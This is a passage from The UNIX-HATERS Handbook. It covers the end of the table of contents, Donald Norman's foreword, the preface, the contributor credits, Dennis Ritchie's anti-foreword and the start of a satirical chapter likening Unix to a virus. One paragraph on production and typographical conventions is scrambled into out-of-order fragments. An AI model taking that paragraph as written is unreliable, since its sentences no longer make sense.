    Oh, I’m Sorry, Sir, Go Ahead, I Didn’t Realize You Were Root
    The Oxymoronic World of Unix Security ... 243
    Holes in the Armor ... 244
    The Worms Crawl In ... 257

13 The File System ... 261
    Sure It Corrupts Your Files, But Look How Fast It Is!
    What’s a File System? ... 262
    UFS: The Root of All Evil ... 265

14 NFS ... 283
    Nightmare File System
    Not Fully Serviceable ... 284
    No File Security ... 287
    Not File System Specific? (Not Quite) ... 292

Part 4: Et Cetera ... 303

A Epilogue ... 305
    Enlightenment Through Unix

B Creators Admit C, Unix Were Hoax ... 307
    FOR IMMEDIATE RELEASE

C The Rise of Worse Is Better ... 311
    By Richard P. Gabriel

D Bibliography ... 317
    Just When You Thought You Were Out of the Woods…

Index ... 319
.
Foreword
By Donald A. Norman

The UNIX-HATERS Handbook? Why? Of what earthly good could it be? Who is the audience? What a perverted idea.

But then again, I have been sitting here in my living room—still wearing my coat—for over an hour now, reading the manuscript. One and one-half hours. Two hours. What a strange book. It's a perverse book, but it has an equally perverse appeal. Who would have thought it: Unix, the hacker's pornography. But appealing. Well, I give up: I like it.

When this particular rock-throwing rabble invited me to join them, I thought back to my own classic paper on the subject, so classic it even got reprinted in a book of readings. But it isn't even referenced in this one. OK, I'll fix that:

Norman, D. A. The Trouble with Unix: The User Interface is Horrid. Datamation, 27 (12), November 1981, pp. 139-150. Reprinted in Pylyshyn, Z. W., & Bannon, L. J., eds., Perspectives on the Computer Revolution, 2nd revised edition. Hillsdale, NJ: Ablex, 1989.

What is this horrible fascination with Unix? The operating system of the 1960s, still gaining in popularity in the 1990s. A horrible system, except that all the other commercial offerings are even worse. The only operating

–––––––––––––––––––––––––––
Copyright 1994 by Donald A. Norman. Printed with permission.
system that is so bad that people spend literally millions of dollars trying to improve it. Make it graphical (now that's an oxymoron, a graphical user interface for Unix).

You know the real trouble with Unix? The real trouble is that it became so popular. It wasn't meant to be popular. It was meant for a few folks working away in their labs, using Digital Equipment Corporation's old PDP-11 computer. I used to have one of those. A comfortable, room-sized machine. Fast—ran an instruction in roughly a microsecond. An elegant instruction set (real programmers, you see, program in assembly code). The PDP-11 had 16,000 words of memory. That was a fantastic advance over my PDP-4 that had 8,000. What kind of challenge is there when you have that much RAM? The Macintosh on which I type this has 64MB: Unix was not designed for the Mac.

Toggle switches on the front panel. Lights to show you what was in the registers. You didn't have to toggle in the boot program anymore, as you did with the PDP-1 and PDP-4, but aside from that it was still a real computer. You can't even single-step today's machines. They always run at full speed. Not like those toys we have today that have no flashing lights, no register switches.

Unix was designed before the days of CRT displays on the console. For many of us, the main input/output device was a 10-character/second, all uppercase teletype (advanced users had 30-character/second teletypes, with upper- and lowercase, both). Equipped with a paper tape reader, I hasten to add. No, those were the real days of computing. And those were the days of Unix. Look at Unix today: the remnants are still there. Try logging in with all capitals. Many Unix systems will still switch to an all-caps mode. Weird.

Unix was a programmer's delight. Simple, elegant underpinnings. The user interface was indeed horrible, but in those days, nobody cared about such things. I was the very first person to complain about it in writing (that infamous Unix article): my article got swiped from my computer, broadcast over UUCP-Net, and I got over 30 single-spaced pages of taunts and jibes in reply. I even got dragged to Bell Labs to stand up in front of an overfilled auditorium to defend myself. I survived. Worse, Unix survived.

Unix was designed for the computing environment of then, not the machines of today. Unix survives only because everyone else has done so badly. There were many valuable things to be learned from Unix: how come nobody learned them and then did better? Started from scratch and produced a really superior, modern, graphical operating system? Oh yeah,
and did the other thing that made Unix so very successful: give it away to all the universities of the world.

The continuing popularity of Unix remains a great puzzle, even though we all know that it is not the best technology that necessarily wins the battle. Much though I try to escape it, it keeps following me. And I have to admit to a deep love-hate relationship with Unix. I'm tempted to say that the authors of this book share a similar love-hate relationship, but when I tried to say so (in a draft of this foreword), I got shot down: "Sure, we love your foreword," but "The only truly irksome part is the 'c'mon, you really love it.' No. Really. We really do hate it. And don't give me that 'you deny it—y'see, that proves it' stuff." I remain suspicious: would anyone have spent this much time and effort writing about how much they hated Unix if they didn't secretly love it? I'll leave that to the readers to judge. But in the end, it really doesn't matter: If this book doesn't kill Unix, nothing will.

As for me? I switched to the Mac. No more grep, no more piping, no more SED scripts. And I truly do miss the ability (actually, the necessity) to write long, exotic command strings, with mysterious, inconsistent flag settings, pipes, filters, and redirections. Just a simple, elegant life: "Your application has unexpectedly quit due to error number –1. OK?"

Donald A. Norman
Apple Fellow
Apple Computer, Inc.
And while I'm at it: Professor of Cognitive Science, Emeritus
University of California, San Diego
Preface
Things Are Going to Get a Lot Worse Before Things Get Worse

"I liken starting one's computing career with Unix, say as an undergraduate, to being born in East Africa. It is intolerably hot, your body is covered with lice and flies, you are malnourished and you suffer from numerous curable diseases. But, as far as young East Africans can tell, this is simply the natural condition and they live within it. By the time they find out differently, it is too late. They already think that the writing of shell scripts is a natural act."
— Ken Pier, Xerox PARC

Modern Unix¹ is a catastrophe. It's the "Un-Operating System": unreliable, unintuitive, unforgiving, unhelpful, and underpowered. Little is more frustrating than trying to force Unix to do something useful and nontrivial. Modern Unix impedes progress in computer science, wastes billions of dollars, and destroys the common sense of many who seriously use it. An exaggeration? You won't think so after reading this book.

–––––––––––––––––––––––––––
¹ Once upon a time, Unix was a trademark of AT&T. Then it was a trademark of Unix Systems Laboratories. Then it was a trademark of Novell. Last we heard, Novell was thinking of giving the trademark to X/Open, but, with all the recent deal making and unmaking, it is hard to track the trademark owner du jour.
Deficient by Design

The original Unix solved a problem and solved it well, as did the Roman numeral system, the mercury treatment for syphilis, and carbon paper. And like those technologies, Unix, too, rightfully belongs to history. It was developed for a machine with little memory, tiny disks, no graphics, no networking, and no power. In those days it was mandatory to adopt an attitude that said:

• "Being small and simple is more important than being complete and correct."
• "You only have to solve 90% of the problem."
• "Everything is a stream of bytes."

These attitudes are no longer appropriate for an operating system that hosts complex and important applications. They can even be deadly when Unix is used by untrained operators for safety-critical tasks.

Ironically, the very attributes and design goals that made Unix a success when computers were much smaller, and were expected to do far less, now impede its utility and usability. Each graft of a new subsystem onto the underlying core has resulted in either rejection or graft vs. host disease with its concomitant proliferation of incapacitating scar tissue. The Unix networking model is a cacophonous Babel of Unreliability that quadrupled the size of Unix's famed compact kernel. Its window system inherited the cryptic unfriendliness of its character-based interface, while at the same time realized new ways to bring fast computers to a crawl. Its new system administration tools take more time to use than they save. Its mailer makes the U.S. Postal Service look positively stellar.

The passing years only magnify the flaws. Using Unix remains an unpleasant experience for beginners and experts alike. Despite a plethora of fine books on the subject, Unix security remains an elusive goal at best. Despite increasingly fast, intelligent peripherals, high-performance asynchronous I/O is a pipe dream. Even though manufacturers spend millions developing "easy-to-use" graphical user interfaces, few versions of Unix allow you to do anything but trivial system administration without having to resort to the 1970s-style teletype interface. Indeed, as Unix is pushed to be more and more, it instead becomes less and less. Unix cannot be fixed from the inside. It must be discarded.
Who We Are

We are academics, hackers, and professionals. None of us were born in the computing analog of Ken Pier's East Africa. We have all experienced much more advanced, usable, and elegant systems than Unix ever was, or ever can be. Some of these systems have increasingly forgotten names, such as TOPS-20, ITS (the Incompatible Timesharing System), Multics, Apollo Domain, the Lisp Machine, Cedar/Mesa, and the Dorado. Some of us even use Macs and Windows boxes. Many of us are highly proficient programmers who have served our time trying to practice our craft upon Unix systems.

It's tempting to write us off as envious malcontents, romantic keepers of memories of systems put to pasture by the commercial success of Unix, but it would be an error to do so: our judgments are keen, our sense of the possible pure, and our outrage authentic. We seek progress, not the reestablishment of ancient relics.
Our story started when the economics of computing began marching us, one by one, into the Unix Gulag. We started passing notes to each other. At first, they spoke of cultural isolation, of primitive rites and rituals that we thought belonged only to myth and fantasy, of depravation and humiliations. As time passed, the notes served as morale boosters, frequently using black humor based upon our observations. Finally, just as prisoners who plot their escape must understand the structure of the prison better than their captors do, we poked and prodded into every crevice. To our horror, we discovered that our prison had no coherent design. Because it had no strong points, no rational basis, it was invulnerable to planned attack. Our rationality could not upset its chaos, and our messages became defeatist, documenting the chaos and lossage.

This book is about people who are in abusive relationships with Unix, woven around the threads in the UNIX-HATERS mailing list. These notes are not always pretty to read. Some are inspired, some are vulgar, some depressing. Few are hopeful. If you want the other side of the story, go read a Unix how-to book or some sales brochures. This book won't improve your Unix skills. If you are lucky, maybe you will just stop using Unix entirely.

The UNIX-HATERS History

The year was 1987, and Michael Travers, a graduate student at the MIT Media Laboratory, was taking his first steps into the future. For years Travers had written large and beautiful programs at the console of his Symbolics Lisp Machine (affectionately known as a LispM), one of two state-of-the-art AI workstations at the Lab. But it was all coming to an end. In the interest of cost and efficiency, the Media Lab had decided to purge its LispMs. If Travers wanted to continue doing research at MIT, he would have to use the Lab's VAX mainframe. The VAX ran Unix.

MIT has a long tradition of mailing lists devoted to particular operating systems, such as ITS-LOVERS, which was organized for programmers and users of the MIT Artificial Intelligence Laboratory's Incompatible Timesharing System. These are lists for systems hackers. These lists are for experts, for people who can—and have—written their own operating systems. Michael Travers decided to create a new list. He called it UNIX-HATERS:

Date:    Thu, 1 Oct 87 13:13:41 EDT
From:    Michael Travers <mt>
To:      UNIX-HATERS
Subject: Welcome to UNIX-HATERS

In the tradition of TWENEX-HATERS, a mailing list for surly folk who have difficulty accepting the latest in operating system technology.

If you are not in fact a Unix hater, let me know and I'll remove you. Please add other people you think need emotional outlets for their frustration.

The first letter that Michael sent to UNIX-HATERS included a well-reasoned rant about Suns written by another new member of the Unix Gulag: John Rose, a programmer at a well-known Massachusetts computer manufacturer (whose lawyers have promised not to sue us if we don't print the company's name). Like Michael, John had recently been forced to give up a Lisp Machine for a computer running Unix. Frustrated after a week of lost work, he sent this message to his company's internal support mailing list:
Date:    Fri, 27 Feb 87 21:39:24 EST
From:    John Rose
To:      sun-users, systems
Subject: Pros and Cons of Suns

Well, I've got a spare minute here, because my Sun's editor window evaporated in front of my eyes, taking with it a day's worth of Emacs state. So, the question naturally arises, what's good and bad about Suns?

This is the fifth day I've used a Sun. Coincidentally, it's also the fifth time my Emacs has given up the ghost. So I think I'm getting a feel for what's good about Suns.

One neat thing about Suns is that they really boot fast. You ought to see one boot, if you haven't already. It's inspiring to those of us whose LispMs take all morning to boot.

Another nice thing about Suns is their simplicity. You know how a LispM is always jumping into that awful, hairy debugger with the confusing backtrace display, and expecting you to tell it how to proceed? Well, Suns ALWAYS know how to proceed. They dump a core file and kill the offending process. What could be easier? If there's a window involved, it closes right up. (Did I feel a draft?) This simplicity greatly decreases debugging time because you immediately give up all hope of finding the problem, and just restart from the beginning whatever complex task you were up to. In fact, at this point, you can just boot. Go ahead, it's fast!

One reason Suns boot fast is that they boot less. When a LispM loads code into its memory, it loads a lot of debugging information too. For example, each function records the names of its arguments and local variables, the names of all macros expanded to produce its code, documentation strings, and sometimes an interpreted definition, just for good measure.

Oh, each function also remembers which file it was defined in. You have no idea how useful this is: there's an editor command called "meta-point" that immediately transfers you to the source of any function, without breaking your stride. ANY function, not just one of a special predetermined set. Likewise, there's a key that causes the calling sequence of a function to be displayed instantly.

Logged into a Sun for the last few days, my Meta-Point reflex has continued unabated, but it is completely frustrated. The program that I am working on has about 80 files. If I want to edit the code of a function Foo, I have to switch to a shell window and grep for named Foo in various files. Then I have to type in the name of the appropriate file. Then I have to correct my spelling error. Finally I have to search inside the file. What used to take five seconds now takes a minute or two. (But what's an order of magnitude between friends?) By this time, I really want to see the Sun at its best, so I'm tempted to boot it a couple of times.

There's a wonderful Unix command called "strip," with which you force programs to remove all their debugging information. Unix programs (such as the Sun window system) are stripped as a matter of course, because all the debugging information takes up disk space and slows down the booting process. This means you can't use the debugger on them. But that's no loss; have you seen the Unix debugger? Really. Unix applications cannot be patched either; you must have the source so you can patch THAT, and then regenerate the application from the source.

Did you know that all the standard Sun window applications ("tools") are really one massive 3/4 megabyte binary? This allows the tools to share code (there's a lot of code in there). Lisp Machines share code this way, too. Isn't it nice that our workstations protect our memory investments by sharing code.

None of the standard Sun window applications ("tools") support Emacs. But I sure wanted my Sun's mouse to talk to Emacs. So I got a couple hundred lines of code (from GNU source) to compile, and link with the very same code that is shared by all the standard Sun window applications ("tools"), so I run my Emacs-with-mice program. Presto! Emacs gets mice! Just like the LispM. I remember similar hacks to the LispM terminal program to make it work with Emacs. It took about 20 lines of Lisp code. (It also took less work than those aforementioned couple hundred lines of code, but what's an order of magnitude between friends?)

Eventually my Emacs window decides it's time to close up for the day. Pretty soon Emacs starts to say things like "Memory exhausted" and "Segmentation violation, core dumped." The little Unix console is consoling itself with messages like "clntudp_create: out of memory." What has happened? Two things, apparently. One is that when I created my custom patch to the window system, to send mouse clicks to Emacs, I created another massive 3/4 megabyte binary, which doesn't share space with the standard Sun window applications ("tools"). This means that instead of one huge mass of shared object code running the window system, I had two such huge masses, identical except for a few pages of code, and taking up space on my paging disk. So I paid a megabyte of swap space for the privilege of using a mouse with my editor. (Emacs itself is a third large mass.) Every trivial hack you make to the window system replicates the entire window system.

The Sun kernel was just plain running out of room. But that's not all: Apparently there are other behemoths of the swap volume. There are some network things with truly stupendous-sized data segments. Moreover, they grow over time, eventually taking over the entire swap volume, I suppose. So you can't leave a Sun up for very long. That's why I'm glad Suns are easy to boot!

But why should a network server grow over time? You've got to realize that the Sun software dynamically allocates very complex data structures. You are supposed to call "free" on every structure you have allocated, but it's understandable that a little garbage escapes now and then because of programmer oversight. Or programmer apathy. So eventually the swap volume fills up! This leads me to daydream about a workstation architecture optimized for the creation and manipulation of large, complex, interconnected data structures, and some magic means of freeing storage without programmer intervention. Such a workstation could stay up for days, reclaiming its own garbage, without need for costly booting operations.

But, of course, Suns are very good at booting! So good, they sometimes spontaneously boot, just to let you know they're in peak form! Well, the console just complained about the lack of memory again. Gosh, there isn't time to talk about the other LispM features I've been free of for the last week. Such as incremental recompilation and loading. Or incremental testing of programs, from a Lisp Listener. Or a window system you can actually teach new things (I miss my
mouse-sensitive Lisp forms). Or manuals. Or safe tagged architecture that rigidly distinguishes between pointers and integers. Or the Control-Meta-Suspend key.

Time to boot!

At the end of his flame, John Rose included this disclaimer:

[Seriously folks: I'm doing my best to get our money's worth out of this box, and there are solutions to some of the above problems. In particular, thanks to Bill for increasing my swap space. But I needed to let off some steam, because this disappearing editor act is really getting my dander up.]

John Rose sent his email message to an internal company mailing list. Somehow it was forwarded to Michael Travers at the Media Lab. John didn't know that Michael was going to create a mailing list for himself and his fellow Unix-hating friends and e-mail it out. But Michael did and, seven years later, John is still on UNIX-HATERS, along with hundreds of other people.

The company in question had bought its Unix workstations to save money. But what they saved in hardware costs they soon spent (and continue to spend) many times over in terms of higher costs for support and lost programmer productivity. Now that we know better, Lisp Machines are a fading memory at the company: everybody uses Unix. Most think of Unix as a pretty good operating system. After all, it's better than DOS. Or is it?

You are not alone

If you have ever used a Unix system, you have probably had the same nightmarish experiences that we have had and heard. You may have deleted important files and gone for help, only to be told that it was your own fault, or, worse, a "rite of passage." You may have spent hours writing a heart-wrenching letter to a friend, only to have it lost in a mailer burp, or, worse, have it sent to somebody else. We aim to show that you are not alone and that your problems with Unix are not your fault.

Our grievance is not just against Unix itself, but against the cult of Unix zealots who defend and nurture it. They take the heat, disease, and pestilence as givens, and, as ancient shamans did, display their wounds, some self-inflicted, as proof of their power and wizardry. We aim, through bluntness and humor, to show them that they pray to a tin god, and that science, not religion, is the path to useful and friendly technology.

Computer science would have progressed much further and faster if all of the time and effort that has been spent maintaining and nurturing Unix had been spent on a sounder operating system. We hope that one day Unix will be relinquished to the history books and museums of computer science as an interesting, albeit costly, footnote.

Contributors and Acknowledgments

To write this book, the editors culled through six years' archives of the UNIX-HATERS mailing list. These contributors are referenced in each included message and are indexed in the rear of the volume. Around these messages are chapters written by UNIX-HATERS experts who felt compelled to contribute to this exposé. We are:

Simson Garfinkel, a journalist and computer science researcher. Simson received three undergraduate degrees from the Massachusetts Institute of Technology and a Master's degree in journalism from Columbia University. He would be in graduate school working on his Ph.D. now, but this book came up and it seemed like more fun. Simson is also the co-author of Practical Unix Security (O'Reilly and Associates, 1991) and NeXTSTEP Programming (Springer-Verlag, 1993). In addition to his duties as editor, Simson wrote the chapters on Documentation, Mail, Networking, and Security.

Daniel Weise, a researcher at Microsoft's research laboratory. Daniel received his Ph.D. and Master's degrees from the Massachusetts Institute of Technology's Artificial Intelligence Laboratory and was an assistant professor at Stanford University's Department of Electrical Engineering until deciding to enter the real world of DOS and Windows. While at his cushy academic job, Daniel had time to work on this project. Since leaving Stanford for the rainy shores of Lake Washington, a challenging new job and a bouncing, crawling, active baby boy have become his priorities. In addition to initial editing, Daniel wrote large portions of Welcome, New User; the Unix File System; and Terminal Insanity.

Steven Strassmann, a senior scientist at Apple Computer. Steven received his Ph.D. from the Massachusetts Institute of Technology's Media Laboratory and is an expert on teaching good manners to computers. He instigated this book in 1992 with a call to arms on the UNIX-HATERS mailing list. He's currently working on Apple's Dylan development environment.

John Klossner, a Cambridge-based cartoonist whose work can be found littering the greater northeastern United States. In his spare time, John enjoys public transportation.

Mark Lottor, who has actively hated Unix since his first Usenix conference in 1984. Mark was a systems programmer on TOPS-20 systems for eight years, then spent a few years of doing Unix system administration. Frustrated by Unix, he now programs microcontrollers in assembler, where he doesn't have to worry about operating systems, shells, compilers, or window systems getting in the way of things. Mark wrote the chapter on System Administration.

Christopher Maeda, a specialist on operating systems who hopes to have his Ph.D. from Carnegie Mellon University by the time this book is published. Christopher wrote most of the chapter on Programming.

Rich Salz is a Principal Software Engineer at the Open Software Foundation, where he works on the Distributed Computing Environment. Rich has been active on the Usenet for many years; during his multiyear tenure as moderator of comp.sources.unix he set the defacto standards for Usenet source distribution still in use. He also bears responsibility for InterNetNews, one of the most virulent NNTP implementations of Usenet. More importantly, he was twice elected editor-in-chief of his college newspaper, The Tech, but both times left school rather than serve out his term. Rich wrote the Snoozenet chapter.

Scott Burson, the author of Zeta C, the first C compiler for the Lisp Machine. These days he makes his living hacking C++ as a consultant in Silicon Valley. Scott wrote most of the chapter on C++.

Don Hopkins, a seasoned user interface designer and graphics programmer. Don wrote the chapter on the X-Windows Disaster. (To annoy X fanatics, Don specifically asked that we include the hyphen after the letter "X," as well as the plural on the word "Windows," in his chapter title.) Don received a BSCS degree from the University of Maryland while working as a researcher at the Human Computer Interaction Lab. Don has worked at UniPress Software, Sun Microsystems, the Turing Institute, and Carnegie Mellon University. He ported SimCity to NeWS and X11 for DUX Software. He now works for Kaleida.

Dennis Ritchie, Head of the Computing Techniques Research Department at AT&T Bell Laboratories. He and Ken Thompson are considered by many to be the fathers of Unix. In the interest of fairness, we asked Dennis to write our Anti-Foreword.

Donald Norman, an Apple Fellow at Apple Computer, Inc. and a Professor Emeritus at the University of California, San Diego. He is the author of more than 12 books including The Design of Everyday Things.

In producing this book, we have used and frequently incorporated messages from Phil Agre, Greg Anderson, Judy Anderson, Rob Austein, Alan Bawden, Alan Borning, Phil Budne, David Chapman, Pavel Curtis, Jim Davis, John R. Dunning, Leonard N. Foner, Mark Friedman, Simson Garfinkel, Chris Garrigues, Ken Harrenstien, Ian D. Horswill, Bruce Howard, James Lee Johnson, David H. Kaufman, Tom Knight, Robert Krajewski, Jerry Leichter, Jim McDonald, Dave Mankins, Richard Mlynarik, Nick Papadakis, Michael A. Patton, Kent M. Pitman, Jonathan Rees, Stephen E. Robbins, Paul Rubin, Robert E. Seastrom, Olin Shivers, Patrick Sobalvarro, Christopher Stacy, Stanley's Tool Works, Steve Strassmann, Michael Tiemann, Michael Travers, David Vinayak Wallace, David Waitzman, Dan Weinreb, Daniel Weise, John Wroclawski, Gail Zacharias, and Jamie Zawinski.

We received advice and support from many people whose words do not appear here, including Beth Rosenberg, Dan Ruby, Alexander Shulgin, Miriam Tucker, David Weise, and Laura Yedwab.

Many people read and commented on various drafts of this manuscript. We would especially like to thank Judy Anderson, Phil Agre, Regina C. Brown, Michael Cohen, Michael Ernst, Dave Hitz, Don Hopkins, Reuven Lerner, Dave Mankins, Eric Raymond, Paul Rubin, M. Strata Rose, Cliff Stoll, Len Tower Jr., Michael Travers, David Waitzman, and Andy Watson. A special thanks to all of you for making many corrections and suggestions, and finding our typos.

The Unix Barf Bag was inspired by Kurt Schmucker, a world-class C++ hater and designer of the infamous C++ barf bag. Thanks, Kurt.

We would especially like to thank Matthew Wagner at Waterside Productions. Matt immediately gravitated to this book in May 1992. He was still interested more than a year later when Simson took over the project from Daniel. Matt paired us up with Christopher Williams at IDG Programmers Press. Chris signed us up without hesitation, then passed us on to Trudy
Amy Pedersen was our Imprint Manager. pic. or any other idiotic Unix acronym. tbl. it was typeset using FrameMaker on a Macintosh. That’s it. We’ve tried to put command names. who saw the project through to its completion. ick. This book was typeset without the aid of troff. and the names of Unix system functions in italics. The UNIX-HATERS cover was illustrated by Ken Copfelt of The Stock Illustration Source. There’s also a courier font used for computer output.Typographical Conventions xxxi Neuhaus. In fact. eqn. in bold. and we make it bold for information typed by the user. Typographical Conventions In this book. We hate computer manuals that look like they were unearthed with the rest of King Tut’s sacred artifacts. This isn’t an unreadable and obscure computer manual with ten different fonts in five different styles. where they appear. we use this roman font for most of the text and a different sans serif font for the horror stories from the UNIX-HATERS mailing list. yuc. . and a NeXTstation. a Windows box.
The UNIX-HATERS Disclaimer

In these days of large immoral corporations that compete on the basis of superior software patents rather than superior software, and that have no compunctions against suing innocent universities, we had better set a few things straight, lest they sic an idle lawyer on us:

• It might be the case that every once in a while these companies allow a programmer to fix a bug rather than apply for a patent, so some of the more superficial problems we document in this book might not appear in a particular version of Unix from a particular supplier. That doesn't really matter, since that same supplier probably introduced a dozen other bugs making the fix. If you can prove that no version of Unix currently in use by some innocent victim isn't riddled with any of the problems that we mention in this volume, we'll issue a prompt apology.

• Inaccuracies may have crept into our narrative, despite our best intentions to keep them out. Don't take our word for gospel for a particular flaw without checking your local Unix implementation.

• Unix haters are everywhere. We are in the universities and the corporations. Our spies have been at work collecting embarrassing electronic memoranda. We don't need the discovery phase of litigation to find the memo calculating that keeping the gas tank where it is will save $35 million annually at the cost of just eight lives. We've already got that memo.
Anti-Foreword
By Dennis Ritchie

From: dmr@plan9.research.att.com
Date: Tue, 15 Mar 1994 00:38:07 EST
Subject: anti-foreword

To the contributers to this book:

I have succumbed to the temptation you offered in your preface: I do write you off as envious malcontents and romantic keepers of memories. The systems you remember so fondly (TOPS-20, ITS, Multics, Lisp Machine, Cedar/Mesa, the Dorado) are not just out to pasture, they are fertilizing it from below.

Your judgments are not keen, they are intoxicated by metaphor. In the Preface you suffer first from heat, lice, and malnourishment, then become prisoners in a Gulag. In Chapter 1 you are in turn infected by a virus, racked by drug addiction, and addled by puffiness of the genome.

Yet your prison without coherent design continues to imprison you. How can this be, if it has no strong places? The rational prisoner exploits the weak places, creates order from chaos: instead, collectives like the FSF vindicate their jailers by building cells almost compatible with the existing ones, albeit with more features. The journalist with three undergraduate degrees from MIT, the researcher at Microsoft, and the senior scientist at Apple might volunteer a few words about the regulations of the prisons to which they have been transferred.

Your sense of the possible is in no sense pure: sometimes you want the same thing you have, but wish you had done it yourselves; other times you want something different, but can't seem to get people to use it; sometimes one wonders why you just don't shut up and tell people to buy a PC with Windows or a Mac. No Gulag or lice, just a future whose intellectual tone and interaction style is set by Sonic the Hedgehog. You claim to seek progress, but you succeed mainly in whining.

Here is my metaphor: your book is a pudding stuffed with apposite observations, many well-conceived. Like excrement, it contains enough undigested nuggets of nutrition to sustain life for some. But it is not a tasty pie: it reeks too much of contempt and of envy.

Bon appetit!
Part 1: User Friendly?
1 Unix
The World's First Computer Virus

"Two of the most famous products of Berkeley are LSD and Unix. I don't think that this is a coincidence."
—Anonymous

Viruses compete by being as small and as adaptable as possible. They aren't very complex: rather than carry around the baggage necessary for arcane tasks like respiration, metabolism, and locomotion, they only have enough DNA or RNA to get themselves replicated. For example, any particular influenza strain is many times smaller than the cells it infects, yet it successfully mutates into a new strain about every other flu season. Most of the time they are nothing more than a minor annoyance—unavoidable, yet ubiquitous. Occasionally, the virulence goes way up, and the resulting epidemic kills a few million people whose immune systems aren't nimble enough to kill the invader before it kills them. Some folks debate whether viruses are living creatures or just pieces of destructive nucleoic acid and protein.

The features of a good virus are:

• Small Size. Viruses don't do very much, so they don't need to be very big.

• Portability. A single virus can invade many different types of cells and, with a few changes, whole new species: animal and primate viruses often mutate to attack humans. Evidence indicates that the AIDS virus may have started as a simian virus.

• Ability to Commandeer Resources of the Host. If the host didn't provide the virus with safe haven and energy for replication, the virus would die.

• Rapid Mutation. Viruses mutate frequently into many different forms. These forms share common structure, but differ just enough to confuse the host's defense mechanisms.

Unix possesses all the hallmarks of a highly successful virus. In its original incarnation, it was very small and had few features. Minimality of design was paramount. Because it lacked features that would make it a real operating system (such as memory mapped files, high-speed input/output, a robust file system; record, file, and device locking; rational interprocess communication; et cetera, ad nauseam), it was portable. A more functional operating system would have been less portable. Unix feeds off the energy of its host; without a system administrator baby-sitting Unix, it regularly panics, dumps core, and halts. Unix frequently mutates: kludges and fixes to make one version behave won't work on another version. If Andromeda Strain had been software, it would have been Unix.

Unix is a computer virus with a user interface.

History of the Plague

The roots of the Unix plague go back to the 1960s, when American Telephone and Telegraph, General Electric, and the Massachusetts Institute of Technology embarked on a project to develop a new kind of computer system called an "information utility." Heavily funded by the Department of Defense's Advanced Research Projects Agency (then known as ARPA), the idea was to develop a single computer system that would be as reliable as an electrical power plant: providing nonstop computational resources to hundreds or thousands of people. The information utility would be equipped with redundant central processor units, memory banks, and input/output processors, so that one could be serviced while others remained running. The system was designed to have the highest level of computer security, so that the actions of one user could not affect another. Its goal was even there in its name: Multics, short for MULTiplexed Information and Computer System.

Multics was designed to store and retrieve large data sets, to be used by many different people at once, and to help them communicate. It likewise protected its users from external attack as well. It was built like a tank. Using Multics felt like driving one.

The Multics project eventually achieved all of its goals. But in 1969, the project was behind schedule and AT&T got cold feet: it pulled the plug on its participation, leaving three of its researchers—Ken Thompson, Dennis Ritchie, and Joseph Ossanna—with some unexpected time on their hands. After the programmers tried unsuccessfully to get management to purchase a DEC System 10 (a powerful timesharing computer with a sophisticated, interactive operating system), Thompson and his friends retired to writing (and playing) a game called Space Travel on a PDP-7 computer that was sitting unused in a corner of their laboratory.

At first, Thompson used Bell Labs' GE645 to cross-compile the Space Travel program for the PDP-7. But soon—rationalizing that it would be faster to write an operating system for the PDP-7 than developing Space War on the comfortable environment of the GE645—Thompson had written an assembler, file system, and minimal kernel for the PDP-7. All to play Space Travel. Thus Unix was brewed.

Like scientists working on germ warfare weapons (another ARPA-funded project from the same time period), the early Unix researchers didn't realize the full implications of their actions. But unlike the germ warfare experimenters, Thompson and Ritchie had no protection. Indeed, rather than practice containment, they saw their role as evangelizers. As it happened, the Lab's patent office needed a system for text processing. Thompson and company innocently wrote a few pages they called documentation, and then they actually started sending it out.

At first, the Unix infection was restricted to a few select groups inside Bell Labs. By 1973, Unix had spread to 25 different systems within the research lab, and AT&T was forced to create the Unix Systems Group for internal support. Researchers at Columbia University learned of Unix and contacted Ritchie for a copy. They bought a PDP-11/20 (by then Unix had mutated and spread to a second host) and became the first willing victims of the strain. Before anybody realized what was happening, Unix had escaped.
Literature avers that Unix succeeded because of its technical superiority. This is not true. Unix was evolutionarily superior to its competitors, but not technically superior. Unix became a commercial success because it was a virus. Its sole evolutionary advantage was its small size, simple design, and resulting portability. Later it became popular and commercially successful because it piggy-backed on three very successful hosts: the PDP-11, the VAX, and Sun workstations. (The Sun was in fact designed to be a virus vector.)

As one DEC employee put it:

From: CLOSET::E::PETER 29-SEP-1989 09:43:26.63
To: closet::t_parmenter
Subj: Unix

In a previous job selling Lisp Machines, I was often asked about Unix. If the audience was not mixed gender, I would sometimes compare Unix to herpes—lots of people have it, nobody wants it, they got screwed when they got it, and if they could, they would get rid of it. There would be smiles, heads would nod, and that would usually end the discussion about Unix.

Of the at least 20 commercial workstation manufacturers that sprouted or already existed at the time (late 1970s to early 1980s), only a handful—Digital, Apollo, Symbolics, HP—resisted Unix. By 1993, Symbolics was in Chapter 11 and Apollo had been purchased (by HP). The remaining companies are now firmly committed to Unix.

Accumulation of Random Genetic Material

Chromosomes accumulate random genetic material; this material gets happily and haphazardly copied and passed down the generations. Once the human genome is fully mapped, we may discover that only a few percent of it actually describes functioning humans; the rest describes orangutans, new mutants, televangelists, and used computer sellers.

The same is true of Unix. Despite its small beginnings, Unix accumulated junk genomes at a tremendous pace. For example, it's hard to find a version of Unix that doesn't contain drivers for a Linotronic or Imagen typesetter, even though few Unix users even know what these machines look like. As Olin Shivers observes, the original evolutionary pressures on Unix have been relaxed, and the strain has gone wild.
Date: Wed, 10 Apr 91 08:31:33 EDT
From: Olin Shivers <shivers@bronto.soar.cs.cmu.edu>
To: UNIX-HATERS
Subject: Unix evolution

I was giving some thought to the general evolution (I use the term loosely, here) of Unix since its inception at Bell Labs, and I think it could be described as follows. In the early PDP-11 days, Unix programs had the following design parameters:

Rule 1. It didn't have to be good, or even correct, but:
Rule 2. It had to be small.

Thus the toolkit approach, and so forth. Of course, over time, computer hardware has become progressively more powerful: processors speed up, address spaces move from 16 to 32 bits, memory gets cheaper, and so forth. So Rule 2 has been relaxed.

The additional genetic material continues to mutate as the virus spreads. It really doesn't matter how the genes got there; they are dutifully copied from generation to generation, with second and third cousins resembling each other about as much as Woody Allen resembles Michael Jordan. This behavior has been noted in several books. For example, Section 15.3, "Routing Information Protocol (RIP)," page 183, of an excellent book on networking called Internetworking with TCP/IP by Douglas Comer, describes how inferior genes survive and mutate in Unix's network code (paragraph 3):

Despite minor improvements over its predecessors, the popularity of RIP as an IGP does not arise from its technical merits. Instead, it has resulted because Berkeley distributed routed software along with the popular 4.X BSD UNIX systems. Thus, many Internet sites adopted and installed routed and started using RIP without even considering its technical merits or limitations.

The next paragraph goes on to say:

